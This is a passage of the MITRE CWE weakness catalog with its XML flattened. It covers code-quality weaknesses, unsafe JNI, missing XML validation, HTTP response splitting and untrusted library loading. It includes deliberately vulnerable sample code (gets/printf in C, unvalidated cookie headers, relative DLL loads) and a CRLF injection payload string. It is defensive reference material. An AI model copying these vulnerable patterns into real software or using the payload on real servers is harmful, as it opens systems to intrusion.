- - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product relies on third-party software components that do - not provide equivalent functionality across all desirable - platforms. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - The product relies on third-party components that are not - actively supported or maintained by the original developer or a trusted proxy - for the original developer. - Reliance on components that are no longer maintained can make it difficult or impossible to fix significant bugs, vulnerabilities, or quality issues. In effect, unmaintained code can become obsolete. -This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - The product or code uses machine-dependent functionality, but - it does not sufficiently encapsulate or isolate this functionality from - the rest of the code. - This issue makes it more difficult to port or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The source code uses literal constants that may need to change - or evolve over time, instead of using symbolic constants. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The source code uses symbolic constants, but it does not - sufficiently place the definitions of these constants into a more centralized or - isolated location. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code is structured in a way that relies too much on using - or setting global variables throughout various points in the code, instead of - preserving the associated information in a narrower, more local - context. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code contains a callable, block, or other code element in - which the same variable is used to control more than one unique task or store - more than one instance of data. - Use of the same variable for multiple purposes can make it more difficult for a person to read or understand the code, potentially hiding other quality issues. -This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java. - Many safety features that programmers may take for granted do not apply for native code, so you must carefully review all such code for potential problems. The languages used to implement native code may be more susceptible to buffer overflows and other attacks. Native code is unprotected by the security features enforced by the runtime environment, such as strong typing and array bounds checking. - - - - - - - Primary - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - Implement error handling around the JNI call. - - - Implementation - Refactoring - Do not use JNI calls if you don't trust the native library. - - - Implementation - Refactoring - Be reluctant to use JNI calls. A Java API equivalent may exist. - - - - - The following code defines a class named Echo. The class declares one native method (defined below), which uses C to echo commands entered on the console back to the user. The following C code defines the native method implemented in the Echo class: - - class Echo { - - public native void runEcho();static { - - System.loadLibrary("echo"); - }public static void main(String[] args) { - - new Echo().runEcho(); - } - } - - - #include <jni.h>#include "Echo.h"//the java class above compiled with javah#include <stdio.h> - JNIEXPORT void JNICALLJava_Echo_runEcho(JNIEnv *env, jobject obj){char buf[64];gets(buf);printf(buf);} - - Because the example is implemented in Java, it may appear that it is immune to memory issues like buffer overflow vulnerabilities. Although Java does do a good job of making memory operations safe, this protection does not extend to vulnerabilities occurring in source code written in other languages that are accessed using the Java Native Interface. Despite the memory protections offered in Java, the C code in this example is vulnerable to a buffer overflow because it makes use of gets(), which does not check the length of its input. - The Sun Java(TM) Tutorial provides the following description of JNI [See Reference]: The JNI framework lets your native method utilize Java objects in the same way that Java code uses these objects. A native method can create Java objects, including arrays and strings, and then inspect and use these objects to perform its tasks. A native method can also inspect and use objects created by Java application code. A native method can even update Java objects that it created or that were passed to it, and these updated objects are available to the Java application. Thus, both the native language side and the Java side of an application can create, update, and access Java objects and then share these objects between them. - The vulnerability in the example above could easily be detected through a source code audit of the native method implementation. This may not be practical or possible depending on the availability of the C source code and the way the project is built, but in many cases it may suffice. However, the ability to share objects between Java and native methods expands the potential risk to much more insidious cases where improper data handling in Java may lead to unexpected vulnerabilities in native code or unsafe operations in native code corrupt data structures in Java. Vulnerabilities in native code accessed through a Java application are typically exploited in the same manner as they are in applications written in the native language. The only challenge to such an attack is for the attacker to identify that the Java application uses native code to perform certain operations. This can be accomplished in a variety of ways, including identifying specific behaviors that are often implemented with native code or by exploiting a system information exposure in the Java application that reveals its use of JNI [See Reference]. - - - - - Unsafe JNI - - - SEC08-J - Define wrappers around native methods - - - JNI01-J - Safely invoke standard APIs that perform tasks using the immediate caller's class loader instance (loadLibrary) - - - JNI00-J - Define wrappers around native methods - Imprecise - - - SFP3 - Use of an improper API - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Description - - Unsafe JNI - - - - The product's design documentation does not adequately describe - control flow, data flow, system initialization, relationships between tasks, - components, rationales, or other important aspects of the - design. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product's documentation does not adequately define inputs, - outputs, or system/software interfaces. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The document does not fully define all mechanisms that are used - to control or influence how product-specific programs are - executed. - This includes environmental variables, configuration files, registry keys, command-line switches or options, or system settings. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The source code uses comment styles or formats that are - inconsistent or do not follow expected standards for the - product. - This issue makes it more difficult to maintain the software due to insufficient legibility, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The source code contains whitespace that is inconsistent across - the code or does not follow expected standards for the - product. - This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The source code contains elements such as source files - that do not consistently provide a prologue or header that has been - standardized for the project. - The lack of a prologue can make it more difficult to accurately and quickly understand the associated code. Standard prologues or headers may contain information such as module name, version number, author, date, purpose, function, assumptions, limitations, accuracy considerations, etc. -This issue makes it more difficult to maintain the software due to insufficient analyzability, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The source code contains comments that do not accurately - describe or explain aspects of the portion of the code with which the comment is - associated. - When a comment does not accurately reflect the associated code elements, this can introduce confusion to a reviewer (due to inconsistencies) or make it more difficult and less efficient to validate that the code is implementing the intended behavior correctly. -This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code contains a function or method whose signature and/or associated - inline documentation does not sufficiently describe the callable's inputs, outputs, - side effects, assumptions, or return codes. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The documentation does not sufficiently describe the techniques - that are used for error handling, exception processing, or similar - mechanisms. - Documentation may need to cover error handling techniques at multiple layers, such as module, executable, compilable code unit, or callable. - - - - - - Indirect - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code uses too many unconditional branches (such as - "goto"). - This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software accepts XML from an untrusted source but does not validate the XML against the proper schema. - Most successful attacks begin with a violation of the programmer's assumptions. By accepting an XML document without validating it against a DTD or XML schema, the programmer leaves a door open for attackers to provide unexpected, unreasonable, or malicious input. - - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Architecture and Design - Input Validation - - Always validate XML input against a known XML Schema or DTD. - It is not possible for an XML parser to validate all aspects of a document's content because a parser cannot understand the complete semantics of the data. However, a parser can do a complete and thorough job of checking the document's structure and therefore guarantee to the code that processes the document that the content is well-formed. - - - - - - The following code loads and parses an XML file. - - - - // Read DOM - try {...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );} catch(Exception ex) {...} - - The XML file is loaded without validating it against a known XML Schema or DTD. - - - The following code creates a DocumentBuilder object to be used in building an XML document. - - DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();builderFactory.setNamespaceAware(true);DocumentBuilder builder = builderFactory.newDocumentBuilder(); - - The DocumentBuilder object does not validate an XML document against a schema, making it possible to create an invalid XML document. - - - - - Missing XML Validation - - - SFP24 - Tainted input to command - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - - - The code is too complex, as calculated using a well-defined, - quantitative measure. - This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. -This issue can make the software perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - Other - Reduce Performance - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code contains McCabe cyclomatic complexity that exceeds a - desirable maximum. - This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - ASCMM-MNT-11 - - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code is structured in a way that a Halstead complexity - measure exceeds a desirable maximum. - A variety of Halstead complexity measures exist, such as program vocabulary size or volume. -This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product uses too much self-modifying - code. - This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The code contains a callable or other code grouping in which - the nesting / branching is too deep. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product has an attack surface whose quantitative - measurement exceeds a desirable maximum. - Originating from software security, an "attack surface" measure typically reflects the number of input points and output points that can be utilized by an untrusted party, i.e. a potential attacker. A larger attack surface provides more places to attack, and more opportunities for developers to introduce weaknesses. In some cases, this measure may reflect other aspects of quality besides security; e.g., a product with many inputs and outputs may require a large number of tests in order to improve code coverage. - - - - - - Indirect - - - - - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The source code declares a variable in one scope, but the - variable is only used within a narrower scope. - This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Other - Reduce Maintainability - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - The code is compiled without sufficient warnings enabled, which - may prevent the detection of subtle bugs or quality - issues. - This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. - - - - - - Indirect - - - - - Build and Compilation - - - - - Other - Reduce Maintainability - - - - - CWE Content Team - MITRE - 2018-07-02 - Entry derived from Common Quality Enumeration (CQE) Draft 0.9. - - - - - The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers. - - Including unvalidated data in an HTTP header allows an attacker to specify the entirety of the HTTP response rendered by the browser. When an HTTP request contains unexpected CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n) characters the server may respond with an output stream that is interpreted as two different HTTP responses (instead of one). An attacker can control the second response and mount attacks such as cross-site scripting and cache poisoning attacks. - HTTP response splitting weaknesses may be present when: - - - Data enters a web application through an untrusted source, most frequently an HTTP request. - The data is included in an HTTP response header sent to a web user without being validated for malicious characters. - - - - - - - - - - - - - - - Implementation - - - - - Integrity - Access Control - Modify Application Data - Gain Privileges or Assume Identity - CR and LF characters in an HTTP header may give attackers control of the remaining headers and body of the response the application intends to send, as well as allowing them to create additional responses entirely under their control. - - - - - Implementation - Input Validation - Construct HTTP headers very carefully, avoiding the use of non-validated input data. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Output Encoding - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response. - - String author = request.getParameter(AUTHOR_PARAM);...Cookie cookie = new Cookie("author", author);cookie.setMaxAge(cookieExpiration);response.addCookie(cookie); - - Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form: - - HTTP/1.1 200 OK...Set-Cookie: author=Jane Smith... - - However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as - - Wiley Hacker\r\nHTTP/1.1 200 OK\r\n - - then the HTTP response would be split into two responses of the following form: - - HTTP/1.1 200 OK...Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK... - - Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: - - - - cross-user defacement - - - web and browser cache poisoning - - - cross-site scripting - - - page hijacking - - - - - - An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the sever. - - - Cross-User Defacement - This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server. - - - - In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application. - - - In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker. - - - - - - - - The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. - - - Cache Poisoning - If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although the user of the local browser instance will be affected. - - - - - Once attackers have control of the responses sent by an application, they have a choice of a variety of malicious content to provide users. - - - Cross-Site Scripting - Cross-site scripting is common form of attack where malicious JavaScript or other code included in a response is executed in the user's browser. - The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data like cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site. - The most common and dangerous attack vector against users of a vulnerable application uses JavaScript to transmit session and authentication information back to the attacker who can then take complete control of the victim's account. - - - - - In addition to using a vulnerable application to send malicious content to a user, the same root vulnerability can also be leveraged to redirect sensitive content generated by the server and intended for the user to the attacker instead. - - - Page Hijacking - By submitting a request that results in two responses, the intended response from the server and the response generated by the attacker, an attacker can cause an intermediate node, such as a shared proxy server, to misdirect a response generated by the server for the user to the attacker. - Because the request made by the attacker generates two responses, the first is interpreted as a response to the attacker's request, while the second remains in limbo. When the user makes a legitimate request through the same TCP connection, the attacker's request is already waiting and is interpreted as a response to the victim's request. The attacker then sends a second request to the server, to which the proxy server responds with the server generated request intended for the victim, thereby compromising any sensitive information in the headers or body of the response intended for the victim. - - - - - - - CVE-2004-2146 - Application accepts CRLF in an object ID, allowing HTTP response splitting. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2146 - - - CVE-2004-1620 - HTTP response splitting via CRLF in parameter related to URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1620 - - - CVE-2004-1656 - HTTP response splitting via CRLF in parameter related to URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1656 - - - CVE-2005-2060 - Bulletin board allows response splitting via CRLF in parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2060 - - - CVE-2005-2065 - Bulletin board allows response splitting via CRLF in parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2065 - - - CVE-2004-2512 - Response splitting via CRLF in PHPSESSID. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2512 - - - CVE-2005-1951 - Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951 - - - CVE-2004-1687 - Chain: HTTP response splitting via CRLF in parameter related to URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687 - - - - - HTTP response splitting - - - HTTP Response Splitting - - - 25 - HTTP Response Splitting - - - SFP24 - Tainted input to command - - - - - - - - - - - - - HTTP response splitting is probably only multi-factor in an environment that uses intermediaries. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated References, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Description, Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Potential_Mitigations, Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - HTTP Response Splitting - Failure to Sanitize CRLF Sequences in HTTP Headers (aka 'HTTP Response Splitting') - Failure to Sanitize CRLF Sequences in HTTP Headers ('HTTP Response Splitting') - - - - Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker. - Process control vulnerabilities take two forms: 1. An attacker can change the command that the program executes: the attacker explicitly controls what the command is. 2. An attacker can change the environment in which the command executes: the attacker implicitly controls what the command means. Process control vulnerabilities of the first type occur when either data enters the application from an untrusted source and the data is used as part of a string representing a command that is executed by the application. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have. - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Architecture and Design - Libraries or Frameworks - Libraries that are loaded should be well understood and come from a trusted source. The application can execute code contained in the native libraries, which often contain calls that are susceptible to other security problems, such as buffer overflows or command injection. All native libraries should be validated to determine if the application requires the use of the library. It is very difficult to determine what these native libraries actually do, and the potential for malicious code is high. In addition, the potential for an inadvertent mistake in these native libraries is also high, as many are written in C or C++ and may be susceptible to buffer overflow or race condition problems. To help prevent buffer overflow attacks, validate all input to native calls for content and length. If the native library does not come from a trusted source, review the source code of the library. The library should be built from the reviewed source before using it. - - - - - The following code uses System.loadLibrary() to load code from a native library named library.dll, which is normally found in a standard system directory. - - ...System.loadLibrary("library.dll");... - - The problem here is that System.loadLibrary() accepts a library name, not a path, for the library to be loaded. From the Java 1.4.2 API documentation this function behaves as follows [1]: A file containing native code is loaded from the local file system from a place where library files are conventionally obtained. The details of this process are implementation-dependent. The mapping from a library name to a specific filename is done in a system-specific manner. If an attacker is able to place a malicious copy of library.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker's library.dll will now be run with elevated privileges, possibly giving them complete control of the system. - - - The following code from a privileged application uses a registry entry to determine the directory in which it is installed and loads a library file based on a relative path from the specified directory. - - ...RegQueryValueEx(hkey, "APPHOME",0, 0, (BYTE*)home, &size);char* lib=(char*)malloc(strlen(home)+strlen(INITLIB));if (lib) { - - strcpy(lib,home);strcat(lib,INITCMD);LoadLibrary(lib); - }... - - The code in this example allows an attacker to load an arbitrary library, from which code will be executed with the elevated privilege of the application, by modifying a registry key to specify a different path containing a malicious version of INITLIB. Because the program does not validate the value read from the environment, if an attacker can control the value of APPHOME, they can fool the application into running malicious code. - - - The following code is from a web-based administration utility that allows users access to an interface through which they can update their profile on the system. The utility makes use of a library named liberty.dll, which is normally found in a standard system directory. - - LoadLibrary("liberty.dll"); - - The problem is that the program does not specify an absolute path for liberty.dll. If an attacker is able to place a malicious library named liberty.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker's liberty.dll will now be run with elevated privileges, possibly giving the attacker complete control of the system. The type of attack seen in this example is made possible because of the search order used by LoadLibrary() when an absolute path is not specified. If the current directory is searched before system 